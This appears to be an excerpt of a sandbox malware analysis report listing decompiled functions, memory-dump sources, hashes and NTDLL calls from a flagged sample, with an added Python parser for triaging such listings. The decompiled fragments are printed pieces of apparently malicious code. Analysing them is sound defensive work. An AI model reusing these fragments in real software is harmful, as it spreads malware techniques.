                                                              • Opcode Fuzzy Hash: d4123807c7c1a80979a81887240b73c0af540e577d3e0ca9c854a41d96db8f50
                                                              • Instruction Fuzzy Hash: 2E513070E111098FDB44EFB9E854AEDBBF6AB84304F10C93AD0249B369DB705945DF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424867426.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @2(m
                                                              • API String ID: 0-4091610512
                                                              • Opcode ID: 5ccf719bbe4417a9fcbd45e4598768e18ea156cf23dae2c63ffea0e0c8ea21f6
                                                              • Instruction ID: 6dc32d464fc2b024fdbe49150b48d94f61f4d0a21b12eafb69a83ca3da9e2068
                                                              • Opcode Fuzzy Hash: 5ccf719bbe4417a9fcbd45e4598768e18ea156cf23dae2c63ffea0e0c8ea21f6
                                                              • Instruction Fuzzy Hash: 43514F70E112098FDB44EFB9E854AEDBBF6AB88304F10C93AD0249B368DB705945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.424426586.0000000000062000.00000020.00020000.sdmp, Offset: 00060000, based on PE: true
• Associated: 00000004.00000002.424408556.0000000000060000.00000002.00020000.sdmp
• Associated: 00000004.00000002.424772643.00000000000EA000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                              • Instruction ID: 37f826cd9b7f9087f7635e3da95cb0a65ea747eae0a82338e1f1ebb6a58d0175
                                                              • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                              • Instruction Fuzzy Hash: BB62686144F7C19FC7535B746DB46E2BFB1AE6321871E44CBD4C0CE0A3E22A195ADB22
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL ref: 0014706F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461677386.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID: 0
                                                              • API String ID: 1778838933-4108050209
                                                              • Opcode ID: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
                                                              • Instruction ID: 253bf68096161b553a6d2928e6edfc7f5ca839ea7ece772036e2f0177ce9be5a
                                                              • Opcode Fuzzy Hash: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
                                                              • Instruction Fuzzy Hash: 14F14F70518A8D8FDBA9EF68C885AEEB7E0FF98305F40462EE44AD7251DF349641CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                              				void* _t18;
                                                              				void* _t27;
                                                              				intOrPtr* _t28;
                                                              
                                                              				_t13 = _a4;
                                                              				_t28 = _a4 + 0xc48;
                                                              				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                              				_t4 =  &_a40; // 0x413a21
                                                              				_t6 =  &_a32; // 0x413d62
                                                              				_t12 =  &_a8; // 0x413d62
                                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                              				return _t18;
			}

Address column (one entry per decompiled statement, in order): 0x00418683 0x0041868f 0x00418697 0x0041869c 0x004186a2 0x004186bd 0x004186c5 0x004186c9

                                                              APIs
                                                              • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: !:A$b=A$b=A
                                                              • API String ID: 2738559852-704622139
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtQueryInformationProcess.NTDLL ref: 0014706F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461677386.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                              Similarity
                                                              • API ID: InformationProcessQuery
                                                              • String ID: 0
                                                              • API String ID: 1778838933-4108050209
                                                              • Opcode ID: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
                                                              • Instruction ID: 64eae806efd05bcb1902572744705b75ac4fcfe72e3c87265f7bf0ec0de19c42
                                                              • Opcode Fuzzy Hash: 9daa3e51e29e9616a5496cc797469a5fe6e4ef91456435e8a65be44ac1812b1f
                                                              • Instruction Fuzzy Hash: 99511C70918A8C8FDB69EF68C8846EEBBF4FB98305F40462EA44AD7251DF309645CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                              				char* _v8;
                                                              				struct _EXCEPTION_RECORD _v12;
                                                              				struct _OBJDIR_INFORMATION _v16;
                                                              				char _v536;
                                                              				void* _t15;
                                                              				struct _OBJDIR_INFORMATION _t17;
                                                              				struct _OBJDIR_INFORMATION _t18;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              
                                                              				_v8 =  &_v536;
                                                              				_t15 = E0041AF60(_a8,  &_v12, 0x104, _a8);
                                                              				_t31 = _t30 + 0xc;
                                                              				if(_t15 != 0) {
                                                              					_t17 = E0041B380(__eflags, _v8);
                                                              					_t32 = _t31 + 4;
                                                              					__eflags = _t17;
                                                              					if(_t17 != 0) {
                                                              						E0041B600( &_v12, 0);
                                                              						_t32 = _t32 + 8;
                                                              					}
                                                              					_t18 = E00419710(_v8);
                                                              					_v16 = _t18;
                                                              					__eflags = _t18;
                                                              					if(_t18 == 0) {
                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                              						return _v16;
                                                              					}
                                                              					return _t18;
                                                              				} else {
                                                              					return _t15;
                                                              				}
			}

Address column (one entry per decompiled line, in order): 0x00409b4c 0x00409b4f 0x00409b54 0x00409b59 0x00409b63 0x00409b68 0x00409b6b 0x00409b6d 0x00409b75 0x00409b7a 0x00409b7a 0x00409b81 0x00409b89 0x00409b8c 0x00409b8e 0x00409ba2 0x00000000 0x00409ba4 0x00409baa 0x00409b5e 0x00409b5e 0x00409b5e

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                              • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004185CA(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				long _t26;
                                                              				void* _t40;
                                                              
                                                              				_t20 = _a4;
                                                              				_t8 = _t20 + 0xc40; // 0xc40
                                                              				E004191D0(_t40, _a4, _t8,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                              				_t26 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              				return _t26;
			}

Address column (one entry per decompiled statement, in order): 0x004185d3 0x004185df 0x004185e7 0x0041861d 0x00418621

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: a260aadcb987d9cee48eecc03de88d4e2dfbb459df2947319c2d09d941673ebf
                                                              • Instruction ID: 781c743693272cec8dbddb5504fe6cdad0a0d66e3555684ad5762d013c43aa27
                                                              • Opcode Fuzzy Hash: a260aadcb987d9cee48eecc03de88d4e2dfbb459df2947319c2d09d941673ebf
                                                              • Instruction Fuzzy Hash: 5701B6B2200109AFCB18CF98DC94EEB37A9AF8C354F15824CFA5D97281C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                              				long _t21;
                                                              				void* _t31;
                                                              
                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                              				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                              				return _t21;
			}

Address column (one entry per decompiled statement, in order): 0x004185df 0x004185e7 0x0041861d 0x00418621

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004187AA(char __eax, void* __ebx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                                              				long _t15;
                                                              				void* _t25;
                                                              
                                                              				 *0x559c091f = __eax;
                                                              				_t11 = _a8;
                                                              				_t3 = _t11 + 0xc60; // 0xca0
                                                              				E004191D0(_t25, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
                                                              				_t15 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                                              				return _t15;
			}

Address column (one entry per decompiled statement, in order): 0x004187ac 0x004187b3 0x004187bf 0x004187c7 0x004187e9 0x004187ed

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 1d5b99e4bb5727c6e441349369025abfd660ffe7d9ac402471c5bdedf16ba209
                                                              • Instruction ID: a16daabcf24435bf9481d7545ed8c5cdab1829824d0368d249ee7da9e0bd5a74
                                                              • Opcode Fuzzy Hash: 1d5b99e4bb5727c6e441349369025abfd660ffe7d9ac402471c5bdedf16ba209
                                                              • Instruction Fuzzy Hash: 77F058B2210208AFDB18DF89CC81EEB77ACAF88244F148149FE0997241C630E910CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                              				long _t14;
                                                              				void* _t21;
                                                              
                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                              				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                              				return _t14;
			}

Address column (one entry per decompiled statement, in order): 0x004187bf 0x004187c7 0x004187e9 0x004187ed

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%
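The records above list the same NTDLL call site under more than one decompiled entry point: NtCreateFile at 0041861D appears under both E004185CA and E004185D0, and NtAllocateVirtualMemory at 004187E9 under both E004187AA and E004187B0 (the decoder started a few bytes early and produced a second Opcode ID for the same wrapper). A triage pass over this kind of listing should therefore key on the call-site address, not on the function record, and should tell apart the regions the calls come from. The following is an added example, not part of the Joe Sandbox report or of the sample's code: a small Python parser for the record layout seen on this page. The sample text it parses is constructed to mirror the records above. The meaning of the dotted fields in the dump file names (process index, analysis step, dump id, region base, page protection, type flag) and the mapping of the fifth field to Win32 PAGE_* constants are assumptions inferred from the names on this page, not a documented format.

```python
"""Added triage helper: pull NTDLL call sites out of a Joe Sandbox function listing."""
import re
from collections import defaultdict

# Constructed excerpt in the layout of the per-function records on this page.
# Sample input built for this example, not copied from a live analysis run.
SAMPLE_REPORT = """
• NtQueryInformationProcess.NTDLL ref: 0014706F
• Source File: 00000005.00000002.461677386.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
• Opcode ID: 76ec579a7f35a6d7911a9a09eabb04d860c1666212f4abd1c1be34adbac18f2c
• NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
• Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
• Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
• Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
• NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7), ref: 0041861D
• Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
• Opcode ID: a260aadcb987d9cee48eecc03de88d4e2dfbb459df2947319c2d09d941673ebf
• NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7), ref: 0041861D
• Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Source File: 00000004.00000002.424802504.00000000002CD000.00000040.00000001.sdmp, Offset: 002CD000, based on PE: false
• Opcode ID: e605ee5cb0c030dfc8abcf21740a385de09661d4966b8b1daa1ad2ef4408a2b4
"""

BULLET = r"^(?:•\s*)?"
API_RE = re.compile(BULLET + r"(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")
SRC_RE = re.compile(BULLET + r"Source File:\s+(?P<file>\S+),\s+Offset:\s+(?P<off>[0-9A-Fa-f]+),\s+based on PE:\s+(?P<pe>true|false)")
OPC_RE = re.compile(BULLET + r"Opcode ID:\s+(?P<id>[0-9a-f]{16,})$")

# Assumption: the fifth dotted field of a dump name is the region's Win32 page
# protection; 0x40 and 0x20 are the two values that occur on this page.
PAGE_NAMES = {0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_source_name(name):
    """Split a dump file name into fields. Field meaning (process index, step,
    dump id, region base, protection, type flag) is inferred from the names on
    this page, not taken from a documented format."""
    f = name.split(".")
    if len(f) != 7 or f[-1] != "sdmp":
        raise ValueError(f"unexpected dump name: {name}")
    protect = int(f[4], 16)
    return {"process": int(f[0]), "step": int(f[1]), "dump_id": f[2],
            "base": int(f[3], 16), "protect": protect,
            "protect_name": PAGE_NAMES.get(protect, f"0x{protect:X}"),
            "type_flag": int(f[5], 16)}


def parse_report(text):
    """One record per function; a record closes at its 'Opcode ID' line.
    Header lines such as 'APIs' or 'Similarity' are simply ignored."""
    records, cur = [], {"apis": [], "yara": False}
    for raw in text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            cur["apis"].append((m["api"], m["dll"], int(m["ref"], 16)))
        elif m := SRC_RE.match(line):
            cur.update(source=m["file"], offset=int(m["off"], 16), based_on_pe=m["pe"] == "true")
        elif line == "Yara matches":
            cur["yara"] = True
        elif m := OPC_RE.match(line):
            cur["opcode_id"] = m["id"]
            records.append(cur)
            cur = {"apis": [], "yara": False}
    return records


def apis_by_region(records):
    """(process, region base) -> sorted unique APIs called from that region."""
    out = defaultdict(set)
    for rec in records:
        info = parse_source_name(rec["source"])
        out[(info["process"], info["base"])].update(a for a, _d, _r in rec["apis"])
    return {k: sorted(v) for k, v in out.items()}


def duplicate_call_sites(records):
    """Call-site address -> opcode IDs of every record containing it. A site
    listed under two Opcode IDs is one wrapper decoded from two entry points."""
    seen = defaultdict(list)
    for rec in records:
        for _api, _dll, ref in rec["apis"]:
            seen[ref].append(rec["opcode_id"])
    return {ref: ids for ref, ids in seen.items() if len(ids) > 1}


def rwx_regions_calling_ntdll(records):
    """Regions dumped as PAGE_EXECUTE_READWRITE that hold direct NTDLL call
    sites: the shape of unpacked or injected code worth dumping first."""
    hits = set()
    for rec in records:
        info = parse_source_name(rec["source"])
        if info["protect"] == 0x40 and any(d.upper() == "NTDLL" for _a, d, _r in rec["apis"]):
            hits.add((info["process"], info["base"]))
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    for region, apis in sorted(apis_by_region(recs).items()):
        print(f"pid {region[0]} base {region[1]:08X}: {', '.join(apis) or '(none)'}")
    for ref, ids in duplicate_call_sites(recs).items():
        print(f"call site {ref:08X} appears in {len(ids)} records")
```

Run against a text export of the full listing, the region summary separates the 0x400000 image in process 5 (NtCreateFile, NtReadFile, NtAllocateVirtualMemory, LdrLoadDll) from the 0x140000 region that only queries process information, and the duplicate map collapses the paired wrapper records so each native call site is counted once.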

                                                              C-Code - Quality: 62%
                                                              			E004186FA(void* __eax, void* __ebx, void* __esi, void* _a4) {
                                                              				intOrPtr _v0;
                                                              				long _t9;
                                                              				void* _t14;
                                                              				void* _t16;
                                                              
                                                              				asm("das");
                                                              				_t16 = __esi + 1;
                                                              				asm("in al, 0x55");
                                                              				_t6 = _v0;
                                                              				_t2 = _t6 + 0x10; // 0x300
                                                              				_push(_t16);
                                                              				_t3 = _t6 + 0xc50; // 0x409753
                                                              				E004191D0(_t14, _v0, _t3,  *_t2, 0, 0x2c);
                                                              				_t9 = NtClose(_a4); // executed
                                                              				return _t9;
                                                              			}

                                                              APIs
                                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418700(intOrPtr _a4, void* _a8) {
                                                              				long _t8;
                                                              				void* _t11;
                                                              
                                                              				_t5 = _a4;
                                                              				_t2 = _t5 + 0x10; // 0x300
                                                              				_t3 = _t5 + 0xc50; // 0x409753
                                                              				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                              				_t8 = NtClose(_a8); // executed
                                                              				return _t8;
                                                              			}

                                                              APIs
                                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
